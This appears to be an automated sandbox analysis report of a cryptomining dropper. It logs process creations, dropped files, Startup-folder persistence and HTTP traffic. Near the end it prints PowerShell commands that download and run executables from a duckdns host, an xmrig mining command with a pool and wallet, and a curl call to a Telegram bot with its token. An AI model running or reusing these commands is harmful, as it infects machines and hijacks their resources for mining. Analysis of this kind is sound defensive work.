Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Updater.lnk.6.dr LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Drivers\winproc.vbs
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, tmp.vbs.27.dr, 6.exe.5.dr
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 2.exe.52.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: 2.exe.52.dr, DllHandler.cs .Net Code: DllNodeHandler
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: 2.exe.52.dr Static PE information: 0xB6F61BA2 [Sat Apr 9 13:44:02 2067 UTC]
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DCA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 27_2_00007FF7033DCA18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7120125
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: section name: .didat
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: section name: _RDATA
Source: 6.exe.5.dr Static PE information: section name: .didat
Source: 6.exe.5.dr Static PE information: section name: _RDATA
Source: xmrig.exe.6.dr Static PE information: section name: .xdata
Source: tmp.vbs.27.dr Static PE information: section name: .didat
Source: tmp.vbs.27.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D4D00 pushfq ; iretd 0_2_00007FF7332D4D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFE7DB700BD pushad ; iretd 5_2_00007FFE7DB700C1
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5744D00 pushfq ; iretd 6_2_00007FF6C5744D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFE7DB519AF pushad ; ret 15_2_00007FFE7DB519B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFE7DB500BD pushad ; iretd 15_2_00007FFE7DB500C1
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E4D00 pushfq ; iretd 31_2_00007FF75C2E4D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 52_2_00007FFE7DB500BD pushad ; iretd 52_2_00007FFE7DB500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 52_2_00007FFE7DB51AD9 push es; ret 52_2_00007FFE7DB51ADA

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe
Source: C:\Users\user\AppData\Roaming\1.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\xmrig.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\1.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\2.exe
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49725
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
